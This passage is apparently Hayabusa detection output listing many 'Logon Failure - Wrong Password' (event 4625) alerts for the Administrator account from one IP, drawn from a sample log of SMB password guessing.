NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UIb1lHuPaC62UlBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2uvXuLIR9yvmWngF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MI35CCybjNtntfwo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GTJfOkk0fUC5YCX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jk6PsiAiLPsHGUh1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KeGDMp9My5eLJz55 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BvDQphjvwOCsNQqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJhad4aocvPMYVP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJl3XqTUxvqiKKaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1fAJDfguuoNxWiR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daAeGcsqoqERsEu6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0iynnwxS8v4C5b3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2kU7IS4XCvgRpTff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MBC8AJXBQHrCMrO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NSGraDQmI4MAq9Ls | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7u2Pb9y8hB0iYWh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A657rbd6k4AD7M4i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7rkiDUBuTCU2jDXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jjsCFTQoobrkQoWF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dNXav95nZyBhVOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yeq1x56Ct6R2Nu3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pUwyCNtwydEQu2bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bX7eihAOk3PUgbwM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPXqAsaYaXEr8I9L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4SaEmIpmlH1VMDun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3Dvp43a2h7Mzx2H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g3voKlRXc7rIaIYs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GF1Q5OhCLRAi96mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: caHe4iY2CQoiumQI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJi6UAm6Pp6eax8Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EW0t2wapD8yniO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PnaITXTihpB0stwx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tdBVoa82WKEAW2ce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BelKzJrEjGIcU2dN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ujeb7fRHPGCGmFm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Czwt7KF2sQHemwdJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LQQ4nNpbfKKVCJZH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6jwIc6e0AHAhXKK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nld9Job0Ll1Fgtmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9sS6i9iU3PXhokz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heaYv6Np8swhoVc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7rzgNBtUJkS93pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh45suNQ09FzPBjd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BOnwAGxxz994k6Ee | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L26mvUKOgGptcKaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aqldRjcLl8KFZr5h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ycNPBtmRHShPOcRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ISlMGsVvXry0rbju | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MjGjh70EQ5YVGJUt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yaYM5N2kuvuRCHRU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 32wgj2t7BLBviVxd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vr1kMRxLEaCIWIbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4PHEJyKgp5wXRtBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbaoz8rTZVXUjRAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d4eD3JQ5gquIqgND | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9slFFSSXhFxPqG1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDb5Up4KwJj0hN5n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxqIpDLlnf6Xyc34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTCTTYmKTIzzJwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oD3dLxlB3qWIhZEQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fe9xMOoCxPJIIyVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DW3YgBZYiGTeEw66 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VAKeeIcOeiQ3H9NF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmF3ot3gJCsBlSwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDjoResfZvvVqqE5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V4dwzMwvVtzztGwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qklApBFOMxVzucD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0IJSphtLB3eNARBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLOFe4w5KpJ2UaGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3JTWkGadY1fJE2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyTH0jxSZB2YVdhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NRq5XrcDkFvabCzh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlYwlgrsMy1kSgEC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AchwW4ifbZ41AQNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PaxF7Q8ue1Kex1h | IP Addr: 192.168.198.149 | AuthPackage: 